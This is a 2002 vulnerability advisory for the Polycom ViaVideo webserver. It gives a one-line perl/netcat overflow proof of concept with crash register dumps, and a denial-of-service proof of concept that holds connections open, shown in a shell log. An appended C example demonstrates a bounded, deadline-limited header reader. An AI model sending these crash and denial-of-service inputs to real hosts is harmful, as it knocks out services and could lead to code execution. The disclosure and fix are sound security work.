advisory @ prophecy.net.nz - 06/09/02

About
-----
The Polycom Webserver is a component of 'ViaVideo' which can be found at:
http://www.polycom.com/resource_center/0,1408,493,00.html

Affected Versions
-----------------
Polycom ViaVideo 2.2
Polycom ViaVideo 3.0

Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component
-------------------------------------------------------------------

Proof of Concept
----------------
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

Error message on host:

OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0 26Feb2002 3.0.0.144

ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

EAX=41414141 EBX=03D491C4 ECX=03D49190 EDX=00000001 ESI=03D49190
EDI=03D4A1E8 EBP=03B6D3F4 ESP=0586FF1C EIP=67302ECE FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000

001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

Problem #2: Denial-of-Service Vulnerability
-------------------------------------------

Proof of Concept
----------------
- Open up several (4) connections to the webserver port (3603).
- Send any incomplete HTTP request.
- Leave these connections open at this point.
- Normal requests to the webserver will now fail.
- CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe

[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5] 2140
[jonny@loki 15:22:14 ~]$
[jonny@loki 15:22:14 ~]$ jobs
[1] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[2] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[3] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[4]- Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5]+ Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[jonny@loki 15:22:39 ~]$

Solution
--------
A patch has been supplied by Polycom and can be downloaded at:
http://www.polycom.com/securitycenter

Thanks
------
Raj.Subramaniam[AT]polycom.com - for working with us to resolve these issues.
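
Added example (not part of the original advisory, and not Polycom's code or patch): a header reader that avoids both failure modes above by checking the length before every copy and giving each connection a deadline to finish its header. All names (hdr_conn, hdr_feed, hdr_tick) and the limits HDR_MAX and HDR_DEADLINE are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <string.h>

#define HDR_MAX      2048   /* assumed cap on total header bytes */
#define HDR_DEADLINE 10     /* assumed seconds allowed to finish the header */

enum hdr_status { HDR_NEED_MORE, HDR_COMPLETE, HDR_TOO_LONG, HDR_TIMEOUT };

struct hdr_conn {
    char   buf[HDR_MAX];
    size_t len;        /* bytes stored so far */
    long   started;    /* time the connection was accepted, in seconds */
};

void hdr_init(struct hdr_conn *c, long now) {
    c->len = 0;
    c->started = now;
}

/* True once the buffer holds the blank line that ends an HTTP header. */
static int hdr_terminated(const struct hdr_conn *c) {
    for (size_t i = 0; i + 3 < c->len; i++)
        if (memcmp(c->buf + i, "\r\n\r\n", 4) == 0)
            return 1;
    return 0;
}

/* Feed bytes received from the socket; never writes past buf. */
enum hdr_status hdr_feed(struct hdr_conn *c, const char *data, size_t n, long now) {
    if (now - c->started > HDR_DEADLINE)
        return HDR_TIMEOUT;              /* stalled, incomplete request */
    if (n > HDR_MAX - c->len)
        return HDR_TOO_LONG;             /* reject before copying anything */
    memcpy(c->buf + c->len, data, n);
    c->len += n;
    return hdr_terminated(c) ? HDR_COMPLETE : HDR_NEED_MORE;
}

/* Timer tick for idle connections: the caller closes the socket on HDR_TIMEOUT. */
enum hdr_status hdr_tick(const struct hdr_conn *c, long now) {
    return (now - c->started > HDR_DEADLINE) ? HDR_TIMEOUT : HDR_NEED_MORE;
}

int main(void) {
    struct hdr_conn c;
    hdr_init(&c, 0);   /* constructed request, complete within the deadline */
    return hdr_feed(&c, "GET / HTTP/1.0\r\n\r\n", 18, 1) == HDR_COMPLETE ? 0 : 1;
}
```

The caller is expected to answer HDR_TOO_LONG with an error response and to close the socket on either HDR_TOO_LONG or HDR_TIMEOUT, so a handful of idle connections cannot hold every worker.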